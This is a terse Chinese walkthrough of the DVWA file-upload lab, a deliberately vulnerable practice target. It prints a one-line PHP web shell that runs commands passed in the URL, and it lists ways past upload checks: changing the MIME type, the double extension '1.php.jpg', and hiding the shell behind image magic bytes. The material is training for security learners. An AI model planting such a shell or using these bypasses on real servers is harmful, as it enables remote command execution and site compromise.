DVWA--文件上传

开门见山

 

---

 

1. 准备一个shell

 

<?php echo shell_exec($_GET['cmd']);?>

 

 

 

2. 上传文件

 

 

 

3. 利用shell

 

 

 

4. Burp抓包，1是文件大小，2是文件类型

 

 

 

5. mimetype判断文件类型

 

 

 

6. 使用1.php.jpg 绕过一些文件后缀检查

 

 

 

7. 图片1代码前几个字节标志文件的类型（jpg或者png），可以删除后面的内容，并替换成shell代码<?php echo shell_exec($_GET['cmd']);?>

 

 

 

---